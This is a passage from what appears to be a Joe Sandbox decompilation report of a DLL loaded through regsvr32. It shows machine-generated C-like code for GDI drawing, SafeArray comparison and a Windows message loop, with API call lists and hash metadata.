                                                                                                                					PatBlt( *(_t228 + 4),  *(_t230 - 0x44),  *(_t230 - 0x40),  *((intOrPtr*)(_t230 - 0x3c)) -  *(_t230 - 0x44),  *((intOrPtr*)(_t230 - 0x38)) -  *(_t230 - 0x40), 0x5a0049);
                                                                                                                					E1000D13A(_t228,  *(_t230 + 0x14));
                                                                                                                				}
                                                                                                                				_t135 = _t230 - 0x14;
                                                                                                                				if( *((intOrPtr*)(_t230 - 0x10)) == 0) {
                                                                                                                					_t135 = _t230 - 0x34;
                                                                                                                				}
                                                                                                                				E1000C878(_t228, _t135);
                                                                                                                				 *((intOrPtr*)( *_t228 + 0x50))(_t230 - 0x44);
                                                                                                                				 *(_t230 + 0x14) = E1000D13A(_t228,  *((intOrPtr*)(_t230 + 0x20)));
                                                                                                                				PatBlt( *(_t228 + 4),  *(_t230 - 0x44),  *(_t230 - 0x40),  *((intOrPtr*)(_t230 - 0x3c)) -  *(_t230 - 0x44),  *((intOrPtr*)(_t230 - 0x38)) -  *(_t230 - 0x40), 0x5a0049);
                                                                                                                				if( *(_t230 + 0x14) != 0) {
                                                                                                                					E1000D13A(_t228,  *(_t230 + 0x14));
                                                                                                                				}
                                                                                                                				E1000C878(_t228, 0);
                                                                                                                				 *(_t230 - 4) = 3;
                                                                                                                				 *((intOrPtr*)(_t230 - 0x14)) = 0x10098308;
                                                                                                                				L1000CFF6(_t230 - 0x14);
                                                                                                                				 *(_t230 - 4) = 2;
                                                                                                                				 *((intOrPtr*)(_t230 - 0x1c)) = 0x10098308;
                                                                                                                				L1000CFF6(_t230 - 0x1c);
                                                                                                                				 *(_t230 - 4) = 1;
                                                                                                                				 *((intOrPtr*)(_t230 - 0x24)) = 0x10098308;
                                                                                                                				L1000CFF6(_t230 - 0x24);
                                                                                                                				 *(_t230 - 4) = 0;
                                                                                                                				 *((intOrPtr*)(_t230 - 0x2c)) = 0x10098308;
                                                                                                                				L1000CFF6(_t230 - 0x2c);
                                                                                                                				 *(_t230 - 4) =  *(_t230 - 4) | 0xffffffff;
                                                                                                                				 *((intOrPtr*)(_t230 - 0x34)) = 0x10098308;
                                                                                                                				return E10047725(L1000CFF6(_t230 - 0x34));
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1001FE82
                                                                                                                  • Part of subcall function 1000EF50: CreateRectRgnIndirect.GDI32(?), ref: 1000EF57
                                                                                                                • CopyRect.USER32(?,?), ref: 1001FEBB
                                                                                                                • InflateRect.USER32 ref: 1001FED1
                                                                                                                • IntersectRect.USER32(?,?,?), ref: 1001FEDF
                                                                                                                • CreateRectRgnIndirect.GDI32(?), ref: 1001FEE9
                                                                                                                • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 1001FEFC
                                                                                                                  • Part of subcall function 1001FC40: CombineRgn.GDI32(?,?,00000002,?), ref: 1001FC63
                                                                                                                • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 1001FF68
                                                                                                                • CopyRect.USER32(?,?), ref: 1001FF85
                                                                                                                • InflateRect.USER32 ref: 1001FF9B
                                                                                                                • IntersectRect.USER32(?,?,?), ref: 1001FFA9
                                                                                                                • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 1001FFDF
                                                                                                                  • Part of subcall function 1001FDD8: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 1001FE1E
                                                                                                                  • Part of subcall function 1001FDD8: CreatePatternBrush.GDI32(00000000), ref: 1001FE2B
                                                                                                                  • Part of subcall function 1001FDD8: DeleteObject.GDI32(00000000), ref: 1001FE37
                                                                                                                • PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 10020054
                                                                                                                  • Part of subcall function 1000D13A: SelectObject.GDI32(?,00000000), ref: 1000D15C
                                                                                                                  • Part of subcall function 1000D13A: SelectObject.GDI32(?,00000004), ref: 1000D172
                                                                                                                • PatBlt.GDI32(00000004,?,?,?,?,005A0049), ref: 100200A7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Create$Object$CopyIndirectInflateIntersectSelect$BitmapBrushCombineDeleteH_prolog3Pattern
                                                                                                                • String ID:
                                                                                                                • API String ID: 3342639795-0
                                                                                                                • Opcode ID: e6ebdf07c837e6b6642f29744d6943f061dcd39849d5f3e70b1e0ec8d207d32e
                                                                                                                • Instruction ID: bd3a7d774bfc99ff7712cfe706d239d58d67da9b393fb4a1fd8b60a1480de821
                                                                                                                • Opcode Fuzzy Hash: e6ebdf07c837e6b6642f29744d6943f061dcd39849d5f3e70b1e0ec8d207d32e
                                                                                                                • Instruction Fuzzy Hash: 039115B590020EAFDF01DFA4CA95DEEBBB9FF08204F104169F506A2251DB34AE05CB65
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 45%
                                                                                                                			E10023058(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr _t86;
                                                                                                                				signed int _t87;
                                                                                                                				signed int _t89;
                                                                                                                				signed int _t90;
                                                                                                                				signed int _t91;
                                                                                                                				signed int _t106;
                                                                                                                				signed int _t113;
                                                                                                                				intOrPtr _t124;
                                                                                                                				intOrPtr _t127;
                                                                                                                				void* _t133;
                                                                                                                				signed int _t141;
                                                                                                                				signed int _t143;
                                                                                                                				intOrPtr _t170;
                                                                                                                				signed int _t188;
                                                                                                                				signed int _t189;
                                                                                                                				intOrPtr* _t191;
                                                                                                                				intOrPtr* _t192;
                                                                                                                				signed int _t193;
                                                                                                                				intOrPtr* _t194;
                                                                                                                				intOrPtr* _t195;
                                                                                                                				signed int _t197;
                                                                                                                				intOrPtr* _t198;
                                                                                                                				void* _t199;
                                                                                                                
                                                                                                                				_push(0x34);
                                                                                                                				E10047680(0x1008f746, __ebx, __edi, __esi);
                                                                                                                				_t86 =  *((intOrPtr*)(_t199 + 8));
                                                                                                                				if(_t86 == 0 ||  *((intOrPtr*)(_t199 + 0xc)) == 0) {
                                                                                                                					__eflags = _t86 -  *((intOrPtr*)(_t199 + 0xc));
                                                                                                                					_t83 = _t86 ==  *((intOrPtr*)(_t199 + 0xc));
                                                                                                                					__eflags = _t83;
                                                                                                                					_t87 = 0 | _t83;
                                                                                                                				} else {
                                                                                                                					_t191 = __imp__#17;
                                                                                                                					_t89 =  *_t191(_t86);
                                                                                                                					_t141 = _t89;
                                                                                                                					 *(_t199 - 0x30) = _t141;
                                                                                                                					_t90 =  *_t191( *((intOrPtr*)(_t199 + 0xc)));
                                                                                                                					_t187 = _t90;
                                                                                                                					if(_t141 == _t90) {
                                                                                                                						__eflags = _t141;
                                                                                                                						if(_t141 != 0) {
                                                                                                                							_t192 = __imp__#18;
                                                                                                                							_t91 =  *_t192( *((intOrPtr*)(_t199 + 8)));
                                                                                                                							 *(_t199 - 0x2c) = _t91;
                                                                                                                							__eflags =  *(_t199 - 0x2c) -  *_t192( *((intOrPtr*)(_t199 + 0xc)));
                                                                                                                							if(__eflags != 0) {
                                                                                                                								goto L3;
                                                                                                                							} else {
                                                                                                                								 *((intOrPtr*)(_t199 - 0x14)) = 0;
                                                                                                                								 *((intOrPtr*)(_t199 - 0x18)) = 0;
                                                                                                                								 *((intOrPtr*)(_t199 - 0x1c)) = 0;
                                                                                                                								 *((intOrPtr*)(_t199 - 0x20)) = 0;
                                                                                                                								 *((intOrPtr*)(_t199 - 0x24)) = 0;
                                                                                                                								 *((intOrPtr*)(_t199 - 0x28)) = 0;
                                                                                                                								 *(_t199 - 4) = 0;
                                                                                                                								_t193 = 4;
                                                                                                                								 *((intOrPtr*)(_t199 - 0x14)) = E10009F14(__eflags,  ~(0 | __eflags > 0x00000000) | _t141 * _t193);
                                                                                                                								 *((intOrPtr*)(_t199 - 0x18)) = E10009F14(__eflags,  ~(0 | __eflags > 0x00000000) | _t187 * _t193);
                                                                                                                								 *((intOrPtr*)(_t199 - 0x1c)) = E10009F14(__eflags,  ~(0 | __eflags > 0x00000000) | _t141 * _t193);
                                                                                                                								 *((intOrPtr*)(_t199 - 0x20)) = E10009F14(__eflags,  ~(0 | __eflags > 0x00000000) | _t187 * _t193);
                                                                                                                								_t143 = 1;
                                                                                                                								_t106 = 0;
                                                                                                                								__eflags = 0;
                                                                                                                								while(1) {
                                                                                                                									__eflags = _t106 -  *(_t199 - 0x30);
                                                                                                                									if(_t106 >=  *(_t199 - 0x30)) {
                                                                                                                										break;
                                                                                                                									}
                                                                                                                									_t197 = _t106 << 2;
                                                                                                                									_t170 =  *((intOrPtr*)(_t199 - 0x14)) + _t197;
                                                                                                                									_t189 = _t106 + 1;
                                                                                                                									 *((intOrPtr*)(_t199 - 0x38)) = _t170;
                                                                                                                									__imp__#20( *((intOrPtr*)(_t199 + 8)), _t189, _t170);
                                                                                                                									E1002303B(_t106);
                                                                                                                									_t124 =  *((intOrPtr*)(_t199 - 0x18)) + _t197;
                                                                                                                									 *((intOrPtr*)(_t199 - 0x3c)) = _t124;
                                                                                                                									__imp__#20( *((intOrPtr*)(_t199 + 0xc)), _t189, _t124);
                                                                                                                									E1002303B(_t124);
                                                                                                                									_t127 =  *((intOrPtr*)(_t199 - 0x1c)) + _t197;
                                                                                                                									 *((intOrPtr*)(_t199 - 0x34)) = _t127;
                                                                                                                									__imp__#19( *((intOrPtr*)(_t199 + 8)), _t189, _t127);
                                                                                                                									E1002303B(_t127);
                                                                                                                									_t198 = _t197 +  *((intOrPtr*)(_t199 - 0x20));
                                                                                                                									__imp__#19( *((intOrPtr*)(_t199 + 0xc)), _t189, _t198);
                                                                                                                									E1002303B( *((intOrPtr*)(_t199 - 0x20)));
                                                                                                                									_t133 =  *((intOrPtr*)( *((intOrPtr*)(_t199 - 0x34)))) -  *((intOrPtr*)( *((intOrPtr*)(_t199 - 0x38))));
                                                                                                                									__eflags = _t133 -  *_t198 -  *((intOrPtr*)( *((intOrPtr*)(_t199 - 0x3c))));
                                                                                                                									if(__eflags == 0) {
                                                                                                                										_t143 = _t143 * (_t133 + 1);
                                                                                                                										_t106 = _t189;
                                                                                                                										continue;
                                                                                                                									} else {
                                                                                                                										_push( *((intOrPtr*)(_t199 - 0x14)));
                                                                                                                										E10009F3F(_t143, _t189, _t198, __eflags);
                                                                                                                										_push( *((intOrPtr*)(_t199 - 0x18)));
                                                                                                                										E10009F3F(_t143, _t189, _t198, __eflags);
                                                                                                                										_push( *((intOrPtr*)(_t199 - 0x1c)));
                                                                                                                										E10009F3F(_t143, _t189, _t198, __eflags);
                                                                                                                										_push( *((intOrPtr*)(_t199 - 0x20)));
                                                                                                                										E10009F3F(_t143, _t189, _t198, __eflags);
                                                                                                                										goto L3;
                                                                                                                									}
                                                                                                                									goto L14;
                                                                                                                								}
                                                                                                                								_t194 = __imp__#23;
                                                                                                                								E1002303B( *_t194( *((intOrPtr*)(_t199 + 8)), _t199 - 0x24));
                                                                                                                								E1002303B( *_t194( *((intOrPtr*)(_t199 + 0xc)), _t199 - 0x28));
                                                                                                                								_t144 = _t143 *  *(_t199 - 0x2c);
                                                                                                                								_t113 = E1004A7B7( *((intOrPtr*)(_t199 - 0x24)),  *((intOrPtr*)(_t199 - 0x28)), _t143 *  *(_t199 - 0x2c));
                                                                                                                								_t195 = __imp__#24;
                                                                                                                								__eflags = _t113;
                                                                                                                								_t188 = 0 | _t113 == 0x00000000;
                                                                                                                								E1002303B( *_t195( *((intOrPtr*)(_t199 + 8))));
                                                                                                                								E1002303B( *_t195( *((intOrPtr*)(_t199 + 0xc))));
                                                                                                                								_push( *((intOrPtr*)(_t199 - 0x14)));
                                                                                                                								 *(_t199 - 4) =  *(_t199 - 4) | 0xffffffff;
                                                                                                                								E10009F3F(_t143 *  *(_t199 - 0x2c), _t188, _t195, __eflags);
                                                                                                                								_push( *((intOrPtr*)(_t199 - 0x18)));
                                                                                                                								E10009F3F(_t143 *  *(_t199 - 0x2c), _t188, _t195, __eflags);
                                                                                                                								_push( *((intOrPtr*)(_t199 - 0x1c)));
                                                                                                                								E10009F3F(_t143 *  *(_t199 - 0x2c), _t188, _t195, __eflags);
                                                                                                                								_push( *((intOrPtr*)(_t199 - 0x20)));
                                                                                                                								E10009F3F(_t144, _t188, _t195, __eflags);
                                                                                                                								_t87 = _t188;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							_t87 = 1;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						L3:
                                                                                                                						_t87 = 0;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				L14:
                                                                                                                				return E10047725(_t87);
                                                                                                                			}



























                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 1002305F
                                                                                                                • SafeArrayGetDim.OLEAUT32(?), ref: 10023080
                                                                                                                • SafeArrayGetDim.OLEAUT32(00000000), ref: 1002308A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ArraySafe$H_prolog3_catch
                                                                                                                • String ID:
                                                                                                                • API String ID: 4271779948-0
                                                                                                                • Opcode ID: 80b381f76954a4d80601cde1f68cc1293a8b7fee6a3f71d49b1963610eb910c1
                                                                                                                • Instruction ID: 44957efc3b56635bff52d89a81c6fb787a21c65e9e7561bfa9423d8dcc95ac9e
                                                                                                                • Opcode Fuzzy Hash: 80b381f76954a4d80601cde1f68cc1293a8b7fee6a3f71d49b1963610eb910c1
                                                                                                                • Instruction Fuzzy Hash: 06615176E00159AFEF04DFB4DC858AEBFB5EF08390B50846AF405E72A0DB359910CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 93%
                                                                                                                			E1000D64C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr _t121;
                                                                                                                				intOrPtr _t127;
                                                                                                                				intOrPtr _t128;
                                                                                                                				void* _t175;
                                                                                                                				void* _t176;
                                                                                                                
                                                                                                                				_t176 = __eflags;
                                                                                                                				_t166 = __edi;
                                                                                                                				_push(0x58);
                                                                                                                				E1004764D(0x1008e0cd, __ebx, __edi, __esi);
                                                                                                                				 *((intOrPtr*)(_t175 - 0x3c)) = 0x1009a2fc;
                                                                                                                				 *(_t175 - 0x38) = 0;
                                                                                                                				 *((intOrPtr*)(_t175 - 0x34)) = 0;
                                                                                                                				 *((intOrPtr*)(_t175 - 0x30)) = 0;
                                                                                                                				 *(_t175 - 4) = 0;
                                                                                                                				 *((intOrPtr*)(_t175 - 0x4c)) = 0x1009a2fc;
                                                                                                                				 *(_t175 - 0x48) = 0;
                                                                                                                				 *((intOrPtr*)(_t175 - 0x44)) = 0;
                                                                                                                				 *((intOrPtr*)(_t175 - 0x40)) = 0;
                                                                                                                				 *((intOrPtr*)(_t175 - 0x18)) = 0;
                                                                                                                				 *((intOrPtr*)(_t175 - 0x1c)) = 0x10098d24;
                                                                                                                				 *(_t175 - 4) = 2;
                                                                                                                				_push(GetSysColor(0x14));
                                                                                                                				E1000D544(0, _t175 - 0x2c, __edi, GetSysColor, _t176);
                                                                                                                				 *(_t175 - 4) = 3;
                                                                                                                				_push(GetSysColor(0x10));
                                                                                                                				E1000D544(0, _t175 - 0x24, __edi, GetSysColor, _t176);
                                                                                                                				 *(_t175 - 4) = 4;
                                                                                                                				if(E1000CCDC(_t175 - 0x3c, _t166, _t175, CreateCompatibleDC(0)) != 0 && E1000CCDC(_t175 - 0x4c, _t166, _t175, CreateCompatibleDC(0)) != 0) {
                                                                                                                					_t173 =  *((intOrPtr*)(_t175 + 8));
                                                                                                                					GetObjectA( *( *((intOrPtr*)(_t175 + 8)) + 4), 0x18, _t175 - 0x64);
                                                                                                                					L1000CFF6( *((intOrPtr*)(_t175 + 0xc)));
                                                                                                                					if(L1000111D( *((intOrPtr*)(_t175 + 0xc)),  *(_t175 - 0x60),  *(_t175 - 0x5c),  *(_t175 - 0x54) & 0x0000ffff,  *(_t175 - 0x52) & 0x0000ffff, 0) != 0 && L1000CFA3(_t175 - 0x1c, _t166, _t175, CreateBitmap( *(_t175 - 0x60),  *(_t175 - 0x5c), 1, 1, 0)) != 0) {
                                                                                                                						 *((intOrPtr*)(_t175 + 8)) = E1000D0A1( *(_t175 - 0x38),  *((intOrPtr*)(_t173 + 4)));
                                                                                                                						_t121 = E1000D0A1( *(_t175 - 0x48),  *((intOrPtr*)(_t175 - 0x18)));
                                                                                                                						 *((intOrPtr*)(_t175 - 0x14)) = _t121;
                                                                                                                						if( *((intOrPtr*)(_t175 + 8)) != 0 && _t121 != 0) {
                                                                                                                							 *((intOrPtr*)(_t175 - 0x10)) = E1000BD03(GetPixel( *(_t175 - 0x38), 0, 0), _t175 - 0x3c, _t122);
                                                                                                                							E1000BD03(BitBlt( *(_t175 - 0x48), 0, 0,  *(_t175 - 0x60),  *(_t175 - 0x5c),  *(_t175 - 0x38), 0, 0, 0xcc0020), _t175 - 0x3c, 0xffffff);
                                                                                                                							BitBlt( *(_t175 - 0x48), 0, 0,  *(_t175 - 0x60),  *(_t175 - 0x5c),  *(_t175 - 0x38), 0, 0, 0x1100a6);
                                                                                                                							_t127 =  *((intOrPtr*)(_t175 + 0xc));
                                                                                                                							if(_t127 != 0) {
                                                                                                                								_t128 =  *((intOrPtr*)(_t127 + 4));
                                                                                                                							} else {
                                                                                                                								_t128 = 0;
                                                                                                                							}
                                                                                                                							if(E1000D0A1( *(_t175 - 0x38), _t128) != 0) {
                                                                                                                								E1000BD03(E10020117(_t175 - 0x3c, 0, 0,  *(_t175 - 0x60),  *(_t175 - 0x5c),  *((intOrPtr*)(_t175 + 0x10))), _t175 - 0x3c, 0xffffff);
                                                                                                                								 *((intOrPtr*)(_t175 + 0xc)) = E1000D13A(_t175 - 0x3c, _t175 - 0x2c);
                                                                                                                								BitBlt( *(_t175 - 0x38), 1, 1,  *(_t175 - 0x60),  *(_t175 - 0x5c),  *(_t175 - 0x48), 0, 0, 0xe20746);
                                                                                                                								E1000D13A(_t175 - 0x3c, _t175 - 0x24);
                                                                                                                								BitBlt( *(_t175 - 0x38), 0, 0,  *(_t175 - 0x60),  *(_t175 - 0x5c),  *(_t175 - 0x48), 0, 0, 0xe20746);
                                                                                                                								E1000BD03(E1000D13A(_t175 - 0x3c,  *((intOrPtr*)(_t175 + 0xc))), _t175 - 0x3c,  *((intOrPtr*)(_t175 - 0x10)));
                                                                                                                							}
                                                                                                                							E1000D0A1( *(_t175 - 0x48),  *((intOrPtr*)( *((intOrPtr*)(_t175 - 0x14)) + 4)));
                                                                                                                							E1000D0A1( *(_t175 - 0x38),  *( *((intOrPtr*)(_t175 + 8)) + 4));
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				 *(_t175 - 4) = 3;
                                                                                                                				 *((intOrPtr*)(_t175 - 0x24)) = 0x10098308;
                                                                                                                				L1000CFF6(_t175 - 0x24);
                                                                                                                				 *(_t175 - 4) = 2;
                                                                                                                				 *((intOrPtr*)(_t175 - 0x2c)) = 0x10098308;
                                                                                                                				L1000CFF6(_t175 - 0x2c);
                                                                                                                				 *(_t175 - 4) = 1;
                                                                                                                				 *((intOrPtr*)(_t175 - 0x1c)) = 0x10098308;
                                                                                                                				L1000CFF6(_t175 - 0x1c);
                                                                                                                				 *(_t175 - 4) = 0;
                                                                                                                				L1000CD56(_t175 - 0x4c);
                                                                                                                				 *(_t175 - 4) =  *(_t175 - 4) | 0xffffffff;
                                                                                                                				return E10047725(L1000CD56(_t175 - 0x3c));
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1000D653
                                                                                                                • GetSysColor.USER32 ref: 1000D690
                                                                                                                  • Part of subcall function 1000D544: __EH_prolog3.LIBCMT ref: 1000D54B
                                                                                                                  • Part of subcall function 1000D544: CreateSolidBrush.GDI32(00000000), ref: 1000D566
                                                                                                                • GetSysColor.USER32 ref: 1000D6A1
                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 1000D6B7
                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 1000D6CB
                                                                                                                • GetObjectA.GDI32(00000004,00000018,?), ref: 1000D6EA
                                                                                                                • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 1000D724
                                                                                                                  • Part of subcall function 1000D0A1: SelectObject.GDI32(?,?), ref: 1000D0A9
                                                                                                                • GetPixel.GDI32(?,00000000,00000000), ref: 1000D76D
                                                                                                                  • Part of subcall function 1000BD03: SetBkColor.GDI32(?,?), ref: 1000BD1D
                                                                                                                  • Part of subcall function 1000BD03: SetBkColor.GDI32(?,?), ref: 1000BD2B
                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 1000D79A
                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,001100A6), ref: 1000D7BF
                                                                                                                • BitBlt.GDI32(?,00000001,00000001,?,?,?,00000000,00000000,00E20746), ref: 1000D81F
                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00E20746), ref: 1000D83E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ColorCreate$CompatibleH_prolog3Object$BitmapBrushPixelSelectSolid
                                                                                                                • String ID:
                                                                                                                • API String ID: 308505048-0
                                                                                                                • Opcode ID: 0d9be748eec67e2a984dbf042de482578c89a59a17858505d87581336b18b9f0
                                                                                                                • Instruction ID: a11892d7ca785269b60d086ed1427836696bf80ae4361ed389aeb394a5747b4d
                                                                                                                • Opcode Fuzzy Hash: 0d9be748eec67e2a984dbf042de482578c89a59a17858505d87581336b18b9f0
                                                                                                                • Instruction Fuzzy Hash: 2C81C575C0020DAEEF01EFE4DC81AEEBBB9EF08384F10802AF515A6165DB719E55DB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 91%
                                                                                                                			E100272E2(intOrPtr* __ecx) {
                                                                                                                				int _v8;
                                                                                                                				int _v12;
                                                                                                                				int _v16;
                                                                                                                				intOrPtr* _v20;
                                                                                                                				struct tagPOINT _v28;
                                                                                                                				struct tagMSG _v56;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				int _t46;
                                                                                                                				int _t49;
                                                                                                                				long _t50;
                                                                                                                				int _t56;
                                                                                                                				int _t58;
                                                                                                                				int _t64;
                                                                                                                				int _t73;
                                                                                                                				int _t83;
                                                                                                                				intOrPtr* _t85;
                                                                                                                				intOrPtr* _t88;
                                                                                                                				intOrPtr* _t89;
                                                                                                                				intOrPtr* _t92;
                                                                                                                				void* _t93;
                                                                                                                
                                                                                                                				_t92 = __ecx;
                                                                                                                				_t88 = 1;
                                                                                                                				if( *((intOrPtr*)(__ecx + 0x68)) == 1) {
                                                                                                                					L26:
                                                                                                                					return _t46;
                                                                                                                				}
                                                                                                                				_t46 = L10026F7E();
                                                                                                                				if(_t46 == 0) {
                                                                                                                					goto L26;
                                                                                                                				}
                                                                                                                				_t46 = PeekMessageA( &_v56,  *(__ecx + 0x20), 0x367, 0x367, 3);
                                                                                                                				if(_t46 != 0) {
                                                                                                                					goto L26;
                                                                                                                				}
                                                                                                                				_t49 =  *(_t92 + 0x68);
                                                                                                                				_v16 = _t49;
                                                                                                                				 *(_t92 + 0x68) = 1;
                                                                                                                				if(_t49 == 2) {
                                                                                                                					L7:
                                                                                                                					__eflags = _v16;
                                                                                                                					_push(0);
                                                                                                                					if(_v16 != 0) {
                                                                                                                						_t50 = SendMessageA( *(_t92 + 0x20), 0x362, 0xe002, ??);
                                                                                                                						__eflags = _t50;
                                                                                                                						_v16 = _t50;
                                                                                                                						if(_t50 == 0) {
                                                                                                                							_v16 = 0xe001;
                                                                                                                						}
                                                                                                                						_v12 = 0;
                                                                                                                						GetCursorPos( &_v28);
                                                                                                                						L10026FD8(_t92, _v28.x, _v28.y, 0);
                                                                                                                						_v8 = 0;
                                                                                                                						_t89 =  *((intOrPtr*)(E1001E302(0, _t88, _t92, __eflags) + 4));
                                                                                                                						_v20 = _t89;
                                                                                                                						while(1) {
                                                                                                                							__eflags =  *(_t92 + 0x68);
                                                                                                                							if( *(_t92 + 0x68) == 0) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                							_t56 = PeekMessageA( &_v56, 0, 0, 0, 0);
                                                                                                                							__eflags = _t56;
                                                                                                                							if(_t56 == 0) {
                                                                                                                								_t82 = _t89;
                                                                                                                								_t58 =  *((intOrPtr*)( *_t89 + 0x60))(_v8);
                                                                                                                								_v8 = _v8 + 1;
                                                                                                                								__eflags = _t58;
                                                                                                                								if(_t58 == 0) {
                                                                                                                									_v8 = 0;
                                                                                                                									WaitMessage();
                                                                                                                								}
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							_t82 = _t92;
                                                                                                                							_t73 = E100270E7(_t92,  &_v56,  &_v12);
                                                                                                                							__eflags = _t73;
                                                                                                                							if(_t73 == 0) {
                                                                                                                								break;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						 *(_t92 + 0x68) = 0;
                                                                                                                						ReleaseCapture();
                                                                                                                						E10013FEA(0, _t82, _t93, SetCapture( *(_t92 + 0x20)));
                                                                                                                						ReleaseCapture();
                                                                                                                						SendMessageA( *(_t92 + 0x20), 0x362, _v16, 0);
                                                                                                                						_t83 =  *(_t92 + 0x80);
                                                                                                                						__eflags = _t83;
                                                                                                                						if(_t83 != 0) {
                                                                                                                							 *((intOrPtr*)( *_t83 + 0x60))(0);
                                                                                                                						}
                                                                                                                						__eflags = _v12;
                                                                                                                						if(_v12 != 0) {
                                                                                                                							__eflags = _v12 - 0xffffffff;
                                                                                                                							if(_v12 != 0xffffffff) {
                                                                                                                								 *((intOrPtr*)( *_v20 + 0xac))(_v12, 1);
                                                                                                                							} else {
                                                                                                                								SendMessageA( *(_t92 + 0x20), 0x111, 0xe147, 0);
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t64 = PostMessageA( *(_t92 + 0x20), 0x36a, 0, 0);
                                                                                                                						L25:
                                                                                                                						return _t64;
                                                                                                                					}
                                                                                                                					_t64 = PostMessageA( *(_t92 + 0x20), 0x111, 0xe145, ??);
                                                                                                                					 *(_t92 + 0x68) = 2;
                                                                                                                					goto L25;
                                                                                                                				}
                                                                                                                				_t88 = _t92 + 0x80;
                                                                                                                				_t85 =  *_t88;
                                                                                                                				if(_t85 == 0) {
                                                                                                                					goto L7;
                                                                                                                				}
                                                                                                                				_push(1);
                                                                                                                				if( *((intOrPtr*)( *_t85 + 0x60))() != 0) {
                                                                                                                					goto L7;
                                                                                                                				} else {
                                                                                                                					_t64 =  *((intOrPtr*)( *((intOrPtr*)( *_t88)) + 0x60))(0);
                                                                                                                					 *(_t92 + 0x68) = 0;
                                                                                                                					goto L25;
                                                                                                                				}
                                                                                                                			}



























